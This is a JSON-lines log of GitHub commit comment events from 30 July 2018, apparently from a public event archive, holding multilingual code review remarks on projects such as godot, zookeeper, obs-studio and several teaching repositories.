{"id":"8037188415","type":"CommitCommentEvent","actor":{"login":"takhlaq"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":29885525,"position":8,"line":988,"path":"scripts/globals/dynamis.lua","commit_id":"674da5b7f771018c842d2c9027a145ca2685ed7a","created_at":"2018-07-30T11:46:43Z","updated_at":"2018-07-30T11:46:43Z","author_association":"MEMBER","body":"what is effect and where do i find it"}},"created_at":"2018-07-30T11:46:43Z"}
{"id":"8037192240","type":"CommitCommentEvent","actor":{"login":"zimplexing"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29885534,"position":87,"line":87,"path":"server/graphql/proxy/commit.js","commit_id":"7007964f4efb837707e7f1608924981cb8fc803a","created_at":"2018-07-30T11:47:36Z","updated_at":"2018-07-30T11:47:36Z","author_association":"NONE","body":"建议\r\n通过promise.all进行并行操作，提供效率"}},"created_at":"2018-07-30T11:47:36Z"}
{"id":"8037192822","type":"CommitCommentEvent","actor":{"login":"KellyThomas"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":29885536,"position":7,"line":7,"path":"modules/mono/glue/cs_files/PackedSceneExtensions.cs","commit_id":"87e7688146295e26e1e70381b366accfec96d5c9","created_at":"2018-07-30T11:47:44Z","updated_at":"2018-07-30T11:47:44Z","author_association":"CONTRIBUTOR","body":"Can this use `GenEditState.Disabled`?"}},"created_at":"2018-07-30T11:47:44Z"}
{"id":"8037194356","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtootsuka/MeikaiJava_ootsuka"},"payload":{"comment":{"id":29885538,"position":6,"line":6,"path":"kennsyuu1/src/kennsyuu1/E1_2.java","commit_id":"95c471c19c57b242ef127d4c4a2545ca6dace6d5","created_at":"2018-07-30T11:48:04Z","updated_at":"2018-07-30T11:48:04Z","author_association":"COLLABORATOR","body":"成田\r\nこの書き方でいいと思います。\r\n自分が何をしなくてはならなくて、それを行う為には何が必要なのか考える癖をつけていきましょう。"}},"created_at":"2018-07-30T11:48:04Z"}
{"id":"8037197418","type":"CommitCommentEvent","actor":{"login":"KellyThomas"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":29885543,"position":5,"line":5,"path":"modules/mono/glue/cs_files/PackedSceneExtensions.cs","commit_id":"87e7688146295e26e1e70381b366accfec96d5c9","created_at":"2018-07-30T11:48:45Z","updated_at":"2018-07-30T11:48:45Z","author_association":"CONTRIBUTOR","body":"Can this use `GenEditState.Disabled`?"}},"created_at":"2018-07-30T11:48:45Z"}
{"id":"8037200653","type":"CommitCommentEvent","actor":{"login":"guilhermesilveira"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt9"},"payload":{"comment":{"id":29885553,"position":15,"line":15,"path":"CSharpPT9/2_FileStreamEStreamReader.cs","commit_id":"fb0c9ef8e246c0eb15ff2d274a10df4181e832e3","created_at":"2018-07-30T11:49:29Z","updated_at":"2018-07-30T11:49:29Z","author_association":"NONE","body":"explicar tambem o modo antigo de abertura que voce tinha que chamar o close explicito. pode ser um para saber mais. (to imaginando que seja analogo a java historicamente).  pq a pessoa pode encontrar isso por ai"}},"created_at":"2018-07-30T11:49:29Z"}
{"id":"8037202191","type":"CommitCommentEvent","actor":{"login":"zimplexing"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29885557,"position":32,"line":32,"path":"util/git-api.js","commit_id":"f5affb2eaa53129d1f2d8b2f886679045032f807","created_at":"2018-07-30T11:49:50Z","updated_at":"2018-07-30T11:49:50Z","author_association":"NONE","body":"高级缺陷\r\n[强烈推荐] String可以使用includes代替indexOf函数，Array可以使用includes方法判断参数是否存在数组中。\r\n"}},"created_at":"2018-07-30T11:49:50Z"}
{"id":"8037202563","type":"CommitCommentEvent","actor":{"login":"guilhermesilveira"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt9"},"payload":{"comment":{"id":29885560,"position":17,"line":17,"path":"CSharpPT9/3_EscrevendoArquivos.cs","commit_id":"fb0c9ef8e246c0eb15ff2d274a10df4181e832e3","created_at":"2018-07-30T11:49:55Z","updated_at":"2018-07-30T11:49:55Z","author_association":"NONE","body":"vai dar cacas de encoding por padrao? entrar no assunto. ele vai usar o encoding da maquina? utf-8? qual?"}},"created_at":"2018-07-30T11:49:55Z"}
{"id":"8037204482","type":"CommitCommentEvent","actor":{"login":"guilhermesilveira"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt9"},"payload":{"comment":{"id":29885567,"position":26,"line":26,"path":"CSharpPT9/3_EscrevendoArquivos.cs","commit_id":"fb0c9ef8e246c0eb15ff2d274a10df4181e832e3","created_at":"2018-07-30T11:50:20Z","updated_at":"2018-07-30T11:50:20Z","author_association":"NONE","body":"usar conteudo de valor real. voce pode pedir o conteudo. por exemplo, o numero da agencia e o numero da conta (em duas linhas separadas) e ai voce concatena e escreve"}},"created_at":"2018-07-30T11:50:20Z"}
{"id":"8037204649","type":"CommitCommentEvent","actor":{"login":"jobthijssen"},"repo":{"name":"jobthijssen/Raspberry-Pi-Camera-Video"},"payload":{"comment":{"id":29885568,"position":null,"line":null,"path":null,"commit_id":"351e99ee5ea566ab4cf1cb8fff872189ef3d2b7b","created_at":"2018-07-30T11:50:22Z","updated_at":"2018-07-30T11:50:22Z","author_association":"OWNER","body":"I see what you have done and I agree with the added comments.\r\nThanks especially for clarifying the PiCamera() command i.e. adding the explanation of the class features.\r\nI will now go ahead and accept your pull request."}},"created_at":"2018-07-30T11:50:22Z"}
{"id":"8037208377","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtootsuka/MeikaiJava_ootsuka"},"payload":{"comment":{"id":29885572,"position":25,"line":25,"path":"kennsyuu1/src/kennsyuu1/E1_2.java","commit_id":"95c471c19c57b242ef127d4c4a2545ca6dace6d5","created_at":"2018-07-30T11:51:14Z","updated_at":"2018-07-30T11:51:14Z","author_association":"COLLABORATOR","body":"成田\r\n処理の翻訳になっています。\r\nコードを見ればわかることではなく、何が目的でこの処理になっているのかを書きましょう。\r\nまたその際一ステップに一行以上のコメントを書いてもかまいません。"}},"created_at":"2018-07-30T11:51:14Z"}
{"id":"8037208722","type":"CommitCommentEvent","actor":{"login":"guilhermesilveira"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt9"},"payload":{"comment":{"id":29885575,"position":20,"line":20,"path":"CSharpPT9/4_StreamsDeCompressaos.cs","commit_id":"fb0c9ef8e246c0eb15ff2d274a10df4181e832e3","created_at":"2018-07-30T11:51:18Z","updated_at":"2018-07-30T11:51:18Z","author_association":"NONE","body":"comeacria com esse e mostraria o resultado. ai depois mostraria a diferenca en tre escrever so os ints e o resultado. ai por fim um exemplo com int/int/string, mas nao uma string q eh equivalente aos ints. uma outra stirng, pode ser o titular... pra msotrar algo que faca sentido"}},"created_at":"2018-07-30T11:51:18Z"}
{"id":"8037208737","type":"CommitCommentEvent","actor":{"login":"boennecd"},"repo":{"name":"marjoleinF/pre"},"payload":{"comment":{"id":29885576,"position":null,"line":null,"path":null,"commit_id":"d118b574ba8504f9f4748419dee5ff5dde46e0ce","created_at":"2018-07-30T11:51:18Z","updated_at":"2018-07-30T11:51:18Z","author_association":"COLLABORATOR","body":"`model.matrix` is now called at https://github.com/marjoleinF/pre/blob/d118b574ba8504f9f4748419dee5ff5dde46e0ce/R/pre.R#L826\r\n\r\nand at https://github.com/marjoleinF/pre/blob/d118b574ba8504f9f4748419dee5ff5dde46e0ce/R/pre.R#L897-L903\r\n\r\nThe first call does not seem to be needed."}},"created_at":"2018-07-30T11:51:18Z"}
{"id":"8037209367","type":"CommitCommentEvent","actor":{"login":"JohnSmithSB"},"repo":{"name":"JohnSmithSB/HelloWorldApp"},"payload":{"comment":{"id":29885578,"position":null,"line":null,"path":null,"commit_id":"ab3195ebf88807007ee47b8853034e1f11f4af76","created_at":"2018-07-30T11:51:27Z","updated_at":"2018-07-30T11:51:27Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://00a39d79.ngrok.io/ui#review:id=28)"}},"created_at":"2018-07-30T11:51:27Z"}
{"id":"8037210964","type":"CommitCommentEvent","actor":{"login":"guilhermesilveira"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt9"},"payload":{"comment":{"id":29885579,"position":19,"line":19,"path":"CSharpPT9/5_Binario.cs","commit_id":"fb0c9ef8e246c0eb15ff2d274a10df4181e832e3","created_at":"2018-07-30T11:51:49Z","updated_at":"2018-07-30T11:51:49Z","author_association":"NONE","body":"usar conteudo que faz sentido. se voce usar aquele texto das agencias com nomes, onde eh repetido conta corrente e agencia diversas vezes eh capaz de dar resultado. voce pode inclusive gerar randomico os numeros num for grande"}},"created_at":"2018-07-30T11:51:49Z"}
{"id":"8037211438","type":"CommitCommentEvent","actor":{"login":"kbaraniecki90"},"repo":{"name":"kbaraniecki90/Szkolenie"},"payload":{"comment":{"id":29885580,"position":null,"line":null,"path":null,"commit_id":"8ec2f6fbebcebfb92c168ffbf5107a0a4f5dc239","created_at":"2018-07-30T11:51:55Z","updated_at":"2018-07-30T11:51:55Z","author_association":"OWNER","body":"Ocena 1"}},"created_at":"2018-07-30T11:51:55Z"}
{"id":"8037214001","type":"CommitCommentEvent","actor":{"login":"smanish1"},"repo":{"name":"smanish01/test12"},"payload":{"comment":{"id":29885583,"position":null,"line":null,"path":null,"commit_id":"75acdc53a0fd4cef78b16c1b6e68d50060bfa72c","created_at":"2018-07-30T11:52:29Z","updated_at":"2018-07-30T11:52:29Z","author_association":"NONE","body":"test commit"}},"created_at":"2018-07-30T11:52:29Z"}
{"id":"8037215306","type":"CommitCommentEvent","actor":{"login":"guilhermesilveira"},"repo":{"name":"GuilhermeMatheus/alura-csharp-pt9"},"payload":{"comment":{"id":29885593,"position":31,"line":31,"path":"CSharpPT9/7_Serializacao.cs","commit_id":"fb0c9ef8e246c0eb15ff2d274a10df4181e832e3","created_at":"2018-07-30T11:52:45Z","updated_at":"2018-07-30T11:52:45Z","author_association":"NONE","body":"aqui entra num perigo pq vao entrar 1000 questoes de serializacao. customizacao de campos, alias, converters etc. no curso de java tem isso? acho que ainda nao temos curso de serializacao xml de c# né? (em java temos)"}},"created_at":"2018-07-30T11:52:45Z"}
{"id":"8037216762","type":"CommitCommentEvent","actor":{"login":"JohnSmithSB"},"repo":{"name":"JohnSmithSB/HelloWorldApp"},"payload":{"comment":{"id":29885596,"position":null,"line":null,"path":null,"commit_id":"852036894ef160aad8a89846a9f20015ffbe052d","created_at":"2018-07-30T11:53:05Z","updated_at":"2018-07-30T11:53:05Z","author_association":"OWNER","body":"Corresponding review in Collaborator has been deleted."}},"created_at":"2018-07-30T11:53:05Z"}
{"id":"8037217463","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29885597,"position":12,"line":12,"path":"Lesson3/route.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T11:53:14Z","updated_at":"2018-07-30T11:53:14Z","author_association":"NONE","body":"Тут станции это именно массив объектов класса Station"}},"created_at":"2018-07-30T11:53:14Z"}
{"id":"8037219850","type":"CommitCommentEvent","actor":{"login":"kykzk46"},"repo":{"name":"kykzk46/MyWindowsExplorer"},"payload":{"comment":{"id":29885600,"position":3,"line":2,"path":"test.cs","commit_id":"366b6ffa139d9fc485ae05efd3054b8efe76e2a0","created_at":"2018-07-30T11:53:45Z","updated_at":"2018-07-30T11:53:45Z","author_association":"OWNER","body":"Test not approve commit"}},"created_at":"2018-07-30T11:53:45Z"}
{"id":"8037225250","type":"CommitCommentEvent","actor":{"login":"JohnSmithSB"},"repo":{"name":"JohnSmithSB/HelloWorldApp"},"payload":{"comment":{"id":29885607,"position":null,"line":null,"path":null,"commit_id":"ab3195ebf88807007ee47b8853034e1f11f4af76","created_at":"2018-07-30T11:54:56Z","updated_at":"2018-07-30T11:54:56Z","author_association":"OWNER","body":"Corresponding review in Collaborator has been deleted."}},"created_at":"2018-07-30T11:54:56Z"}
{"id":"8037226446","type":"CommitCommentEvent","actor":{"login":"JohnSmithSB"},"repo":{"name":"JohnSmithSB/HelloWorldApp"},"payload":{"comment":{"id":29885613,"position":null,"line":null,"path":null,"commit_id":"09dff73d26b2fcfeb273c8c12b6f4c7421018d0a","created_at":"2018-07-30T11:55:11Z","updated_at":"2018-07-30T11:55:11Z","author_association":"OWNER","body":"Corresponding review in Collaborator has been deleted."}},"created_at":"2018-07-30T11:55:11Z"}
{"id":"8037226483","type":"CommitCommentEvent","actor":{"login":"atallahade"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29885614,"position":4,"line":70,"path":"xwiki-platform-core/xwiki-platform-activitystream/xwiki-platform-activitystream-ui/pom.xml","commit_id":"ac297d966780d5aa953c883f735cb04ebde3cef7","created_at":"2018-07-30T11:55:12Z","updated_at":"2018-07-30T11:55:12Z","author_association":"CONTRIBUTOR","body":"I like having empty new lines in files to separate things as I can quickly navigate between paragraphs using vim but that's only one use case and there are other ways to navigate through a file."}},"created_at":"2018-07-30T11:55:12Z"}
{"id":"8037227328","type":"CommitCommentEvent","actor":{"login":"wjt"},"repo":{"name":"endlessm/libanimation-dbus"},"payload":{"comment":{"id":29885615,"position":8,"line":8,"path":"animations-dbus/animations-dbus-server-animation-manager.h","commit_id":"f063d578f7d1b440c22b934db579221f8ccef69d","created_at":"2018-07-30T11:55:23Z","updated_at":"2018-07-30T11:55:23Z","author_association":"NONE","body":"(Noticed this in the GitHub firehose, and was curious.) This isn't eos-discovery-feed."}},"created_at":"2018-07-30T11:55:23Z"}
{"id":"8037236257","type":"CommitCommentEvent","actor":{"login":"fazo96"},"repo":{"name":"ChluNetwork/chlu-ipfs-support"},"payload":{"comment":{"id":29885626,"position":8,"line":206,"path":"src/modules/reviewrecords.js","commit_id":"b384fb49bf05fe47bdd4d3fb056ef5f646513c66","created_at":"2018-07-30T11:57:22Z","updated_at":"2018-07-30T11:57:22Z","author_association":"COLLABORATOR","body":"Kind of, for example we have this for review records: https://github.com/ChluNetwork/chlu-ipfs-support/blob/cleanup-and-fixes/src/modules/reviewrecords.js#L233\r\n\r\nYou mean a method that waits for the content to be pinned __remotely__ right? then the method would be like\r\n\r\n```javascript\r\nasync function storeAndPin(content) {\r\n  const multihash = await storeOnIPFS(content)\r\n  await submitPinRequest(multihash)\r\n  await hearPinResponse(multihash)\r\n  return multihash\r\n}\r\n```\r\n\r\nWe could have something like this instead of the current messier solution. We also have a `broadcastUntil` function used to broadcast a request and wait for a specific response to arrive before resolving the promise"}},"created_at":"2018-07-30T11:57:22Z"}
{"id":"8037238268","type":"CommitCommentEvent","actor":{"login":"vedant-khandelwal"},"repo":{"name":"Falkonry/falkonry-sdk-documentation"},"payload":{"comment":{"id":29885631,"position":null,"line":null,"path":null,"commit_id":"a89c8be1094969454937753acb7f01b1308b0be4","created_at":"2018-07-30T11:57:48Z","updated_at":"2018-07-30T11:57:48Z","author_association":"CONTRIBUTOR","body":"@DhruvBhagadia Along with the source file, build file should also be committed."}},"created_at":"2018-07-30T11:57:48Z"}
{"id":"8037240046","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29885639,"position":15,"line":15,"path":"Lesson3/route.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T11:58:10Z","updated_at":"2018-07-30T11:58:10Z","author_association":"NONE","body":"Так тоже будет работать. Только мы будем предполагать, что на момент создания маршрута станция уже существует.\r\n```\r\nstation1 = Station.new(\"first_city\")\r\nstation2 = Station.new(\"last_city\")\r\nRoute.new(station1, station2)\r\n```\r\nТо есть мы в при создании маршрута передаем ему начальную и конечную станции, как аргумент"}},"created_at":"2018-07-30T11:58:10Z"}
{"id":"8037241347","type":"CommitCommentEvent","actor":{"login":"fumikito"},"repo":{"name":"wct2018/wct2018"},"payload":{"comment":{"id":29885642,"position":55,"line":55,"path":"src/scss/templates/_footer.scss","commit_id":"dc6e87c74e8eee9f9df941a767df3de6e5558219","created_at":"2018-07-30T11:58:26Z","updated_at":"2018-07-30T11:58:26Z","author_association":"MEMBER","body":"@0serika0 ここが `display:none;` だと表示されないのでは？"}},"created_at":"2018-07-30T11:58:26Z"}
{"id":"8037241779","type":"CommitCommentEvent","actor":{"login":"ivesbrito"},"repo":{"name":"jimmiw/php-time-ago"},"payload":{"comment":{"id":29885644,"position":null,"line":null,"path":null,"commit_id":"a0a2de224646aec5411afd79a5352d167d7a1374","created_at":"2018-07-30T11:58:31Z","updated_at":"2018-07-30T11:58:31Z","author_association":"NONE","body":"=)"}},"created_at":"2018-07-30T11:58:31Z"}
{"id":"8037241925","type":"CommitCommentEvent","actor":{"login":"zimplexing"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29885645,"position":36,"line":54,"path":"server/graphql/proxy/commit.js","commit_id":"9fccd5ee5e7e5782f6d738105238d8f738071daa","created_at":"2018-07-30T11:58:33Z","updated_at":"2018-07-30T11:58:33Z","author_association":"NONE","body":"建议\r\n改成promise.all并行执行"}},"created_at":"2018-07-30T11:58:33Z"}
{"id":"8037244405","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29885646,"position":16,"line":16,"path":"Lesson3/route.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T11:59:02Z","updated_at":"2018-07-30T11:59:02Z","author_association":"NONE","body":"На самом деле все ООП будет строиться на объектах и методах (сообщениях) которыми они будут обмениваться"}},"created_at":"2018-07-30T11:59:02Z"}
{"id":"8037246937","type":"CommitCommentEvent","actor":{"login":"Viky9936"},"repo":{"name":"Viky9936/AspNetKatana"},"payload":{"comment":{"id":29885652,"position":12,"line":17,"path":"src/Microsoft.Owin.Cors/CorsMiddleware.cs","commit_id":"3ca72cef2af45f0d470fdef7576eca77f22afed8","created_at":"2018-07-30T11:59:33Z","updated_at":"2018-07-30T11:59:33Z","author_association":"OWNER","body":"dshvfjs"}},"created_at":"2018-07-30T11:59:33Z"}
{"id":"8037247838","type":"CommitCommentEvent","actor":{"login":"aleb"},"repo":{"name":"thiblahute/gst-editing-services"},"payload":{"comment":{"id":29885655,"position":null,"line":null,"path":null,"commit_id":"ecf14ca6d771fbe0fa3713b3f816bb9fc5c17653","created_at":"2018-07-30T11:59:44Z","updated_at":"2018-07-30T11:59:44Z","author_association":"NONE","body":"You could also add a test for the other property, and while you are at it, could you add one for the \"type\" of the transition clip—I have the impression that also fails to serialise?"}},"created_at":"2018-07-30T11:59:44Z"}
{"id":"8037254190","type":"CommitCommentEvent","actor":{"login":"filipekiss"},"repo":{"name":"ahmedelgabri/dotfiles"},"payload":{"comment":{"id":29885676,"position":5,"line":12,"path":"vim/.vim/after/plugin/fugitive.vim","commit_id":"a4c823c6b0210bde1db5fbd5bc89f1188457679a","created_at":"2018-07-30T12:00:56Z","updated_at":"2018-07-30T12:00:56Z","author_association":"NONE","body":"You're missing an `a` here, aren't you?"}},"created_at":"2018-07-30T12:00:56Z"}
{"id":"8037254954","type":"CommitCommentEvent","actor":{"login":"smspillaz"},"repo":{"name":"endlessm/libanimation-dbus"},"payload":{"comment":{"id":29885678,"position":8,"line":8,"path":"animations-dbus/animations-dbus-server-animation-manager.h","commit_id":"f063d578f7d1b440c22b934db579221f8ccef69d","created_at":"2018-07-30T12:01:07Z","updated_at":"2018-07-30T12:01:07Z","author_association":"CONTRIBUTOR","body":"Yeah, I've been meaning to fix these up, just haven't gotten around to it :-)"}},"created_at":"2018-07-30T12:01:07Z"}
{"id":"8037255693","type":"CommitCommentEvent","actor":{"login":"marcelklehr"},"repo":{"name":"marcelklehr/floccus"},"payload":{"comment":{"id":29885679,"position":19,"line":17,"path":"src/lib/Tree.js","commit_id":"c55d52658e37eabc5a2276d003ea2253cdac2d31","created_at":"2018-07-30T12:01:15Z","updated_at":"2018-07-30T12:01:15Z","author_association":"OWNER","body":"Oi. Nicely spotted. That would be a mistake. markDirty is marked as async to allow seamlessly switching out the hash function to an async one. This code is removed in v3.0.0, however."}},"created_at":"2018-07-30T12:01:15Z"}
{"id":"8037256120","type":"CommitCommentEvent","actor":{"login":"maoling"},"repo":{"name":"apache/zookeeper"},"payload":{"comment":{"id":29885683,"position":null,"line":null,"path":null,"commit_id":"a2623a625a4778720f7d5482d0a66e9b37ae556f","created_at":"2018-07-30T12:01:21Z","updated_at":"2018-07-30T12:01:21Z","author_association":"CONTRIBUTOR","body":"@nkalmar \r\nThanks for your ACK. 4 letter words will be deprecated? why?"}},"created_at":"2018-07-30T12:01:21Z"}
{"id":"8037256933","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29885686,"position":30,"line":30,"path":"Lesson3/route.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T12:01:32Z","updated_at":"2018-07-30T12:01:32Z","author_association":"NONE","body":"может удалять именно промежуточную станцию. Тут не проверяется входит ли удаляемая станция в начальную, или конечную"}},"created_at":"2018-07-30T12:01:32Z"}
{"id":"8037260540","type":"CommitCommentEvent","actor":{"login":"exts"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":29885692,"position":5,"line":5,"path":"modules/mono/glue/cs_files/PackedSceneExtensions.cs","commit_id":"87e7688146295e26e1e70381b366accfec96d5c9","created_at":"2018-07-30T12:02:19Z","updated_at":"2018-07-30T12:02:19Z","author_association":"NONE","body":"I could, but I just copied the original definition. So I'm going to keep it consistent with that definition."}},"created_at":"2018-07-30T12:02:19Z"}
{"id":"8037264096","type":"CommitCommentEvent","actor":{"login":"Endyl"},"repo":{"name":"Pepita73/webproghu_dev"},"payload":{"comment":{"id":29885700,"position":null,"line":null,"path":null,"commit_id":"4a766379009d517097438c4dc009009ef152c0fd","created_at":"2018-07-30T12:03:06Z","updated_at":"2018-07-30T12:03:06Z","author_association":"COLLABORATOR","body":"- [`sandard.profile`](https://github.com/Pepita73/webproghu_dev/commit/4a766379009d517097438c4dc009009ef152c0fd#diff-f62678c13b763caa7809e9bfe52c1c01):\r\n  - hiányzik a nyitó php tag\r\n  - hiányzik `use Drupal\\Core\\Form\\FormStateInterface;`\r\n\r\nEzeket javítva nálam is felépül rendesen a rendszer."}},"created_at":"2018-07-30T12:03:06Z"}
{"id":"8037265156","type":"CommitCommentEvent","actor":{"login":"sriemer"},"repo":{"name":"ugtrain/ugtrain"},"payload":{"comment":{"id":29885703,"position":null,"line":null,"path":null,"commit_id":"11e3281e1643661749d33020e11954a100b38903","created_at":"2018-07-30T12:03:18Z","updated_at":"2018-07-30T12:03:18Z","author_association":"MEMBER","body":"In case you are looking at this commit: This idea did not help. Only `secure_getenv` makes Coverity Scan happy."}},"created_at":"2018-07-30T12:03:18Z"}
{"id":"8037265384","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29885705,"position":34,"line":34,"path":"Lesson3/route.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T12:03:21Z","updated_at":"2018-07-30T12:03:21Z","author_association":"NONE","body":"Это верный вариант, только я бы еще переименовал метод на list_stations, что-б ближе отразить то, что метод делает"}},"created_at":"2018-07-30T12:03:21Z"}
{"id":"8037265449","type":"CommitCommentEvent","actor":{"login":"boennecd"},"repo":{"name":"marjoleinF/pre"},"payload":{"comment":{"id":29885706,"position":null,"line":null,"path":null,"commit_id":"d118b574ba8504f9f4748419dee5ff5dde46e0ce","created_at":"2018-07-30T12:03:22Z","updated_at":"2018-07-30T12:03:22Z","author_association":"COLLABORATOR","body":"The `cbind` can be avoided here https://github.com/marjoleinF/pre/blob/d118b574ba8504f9f4748419dee5ff5dde46e0ce/R/pre.R#L898\r\n\r\nby adding the `x_names` to the `formula` e.g., with `update`. This saves a copy of a potentially quite large matrix. "}},"created_at":"2018-07-30T12:03:22Z"}
{"id":"8037268706","type":"CommitCommentEvent","actor":{"login":"gligoran"},"repo":{"name":"klei/gulp-inject"},"payload":{"comment":{"id":29885714,"position":null,"line":null,"path":null,"commit_id":"831d4b08a94a97aedb0e55a726dd03c3dffb70e9","created_at":"2018-07-30T12:04:05Z","updated_at":"2018-07-30T12:04:05Z","author_association":"CONTRIBUTOR","body":"Can we make this wrapping feature opt-in or at least opt-out? The wrapping into `asset` function is breaking my deploy process, because Symfony is apparently checking weather the files actually exist. Because of some cache-busting I'm doing along side injecting files into my twigs, they don't actually exist and deploy fails.\r\n\r\nFor now I'm reverting to 4.3.1."}},"created_at":"2018-07-30T12:04:05Z"}
{"id":"8037271585","type":"CommitCommentEvent","actor":{"login":"zimplexing"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29885730,"position":59,"line":59,"path":"server/graphql/tools/bitbucket-codereview-tools.js","commit_id":"9fccd5ee5e7e5782f6d738105238d8f738071daa","created_at":"2018-07-30T12:04:40Z","updated_at":"2018-07-30T12:04:40Z","author_association":"NONE","body":"高级缺陷\r\n[强烈推荐] String可以使用includes代替indexOf函数，Array可以使用includes方法判断参数是否存在数组中。"}},"created_at":"2018-07-30T12:04:40Z"}
{"id":"8037274670","type":"CommitCommentEvent","actor":{"login":"zimplexing"},"repo":{"name":"EmptyCup20/easy-codereview"},"payload":{"comment":{"id":29885739,"position":28,"line":20,"path":"server/api/routes/users.js","commit_id":"f9fda9e33a07e2165108f0ccd2b7f70eea384e2b","created_at":"2018-07-30T12:05:21Z","updated_at":"2018-07-30T12:05:21Z","author_association":"NONE","body":"建议\r\ncode建议也统一在一个文件中管理"}},"created_at":"2018-07-30T12:05:21Z"}
{"id":"8037277580","type":"CommitCommentEvent","actor":{"login":"adefirmanf"},"repo":{"name":"adefirmanf/PixivVoteApp"},"payload":{"comment":{"id":29885747,"position":null,"line":null,"path":null,"commit_id":"2ec006eeab32d2f449d7a609bf63adcab32e168b","created_at":"2018-07-30T12:05:57Z","updated_at":"2018-07-30T12:05:57Z","author_association":"OWNER","body":"Refer to #6 "}},"created_at":"2018-07-30T12:05:57Z"}
{"id":"8037279487","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29885750,"position":21,"line":21,"path":"Lesson3/station.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T12:06:19Z","updated_at":"2018-07-30T12:06:19Z","author_association":"NONE","body":"Да, но эта логика будет принадлежать поезду. Именно поезд знает свой маршрут и знает как из него найти предыдущую/текущую/следующие станции. "}},"created_at":"2018-07-30T12:06:19Z"}
{"id":"8037282549","type":"CommitCommentEvent","actor":{"login":"singhabhinav6996"},"repo":{"name":"chaharshivam/DataStructures"},"payload":{"comment":{"id":29885757,"position":36,"line":36,"path":"Introduction.md","commit_id":"86e56e452cec3b21b13071491081d1cac4eab86e","created_at":"2018-07-30T12:06:58Z","updated_at":"2018-07-30T12:06:58Z","author_association":"NONE","body":"A practical example would be stacks which follow last-in-first-out approach and use keywords like Push and Pop for their functionality."}},"created_at":"2018-07-30T12:06:58Z"}
{"id":"8037286729","type":"CommitCommentEvent","actor":{"login":"notr1ch"},"repo":{"name":"obsproject/obs-studio"},"payload":{"comment":{"id":29885767,"position":null,"line":null,"path":null,"commit_id":"2d60c89a02e5f1559603ed83de08a05e2077101a","created_at":"2018-07-30T12:07:52Z","updated_at":"2018-07-30T12:07:52Z","author_association":"MEMBER","body":"Hotkeys are a UI feature, so depending on the UI seemed pretty reasonable to me. I didn't see a better way to implement this without adding new functions to the output API. Currently there is no way to tell if the RTMP output is in the middle of connecting, since it's only marked as active once the connection is established."}},"created_at":"2018-07-30T12:07:52Z"}
{"id":"8037288304","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29885770,"position":22,"line":22,"path":"Lesson3/station.rb","commit_id":"a99efe67eed6a79b56ee813b4913c2e62f098212","created_at":"2018-07-30T12:08:14Z","updated_at":"2018-07-30T12:08:14Z","author_association":"NONE","body":"Это проблемы поезда, а не станции. Станции не знают ничего друг про друга. А поезд знает как добраться только на те станции, которые у него есть в маршруте."}},"created_at":"2018-07-30T12:08:14Z"}
{"id":"8037288530","type":"CommitCommentEvent","actor":{"login":"amreo"},"repo":{"name":"hneemann/Digital"},"payload":{"comment":{"id":29885771,"position":null,"line":null,"path":null,"commit_id":"70eda1fcc20869feaca072c3c2742a596d55902b","created_at":"2018-07-30T12:08:16Z","updated_at":"2018-07-30T12:08:16Z","author_association":"NONE","body":"Thank you"}},"created_at":"2018-07-30T12:08:16Z"}
{"id":"8037289137","type":"CommitCommentEvent","actor":{"login":"TimCool72"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29885773,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-30T12:08:25Z","updated_at":"2018-07-30T12:08:25Z","author_association":"NONE","body":"Great project!!"}},"created_at":"2018-07-30T12:08:25Z"}
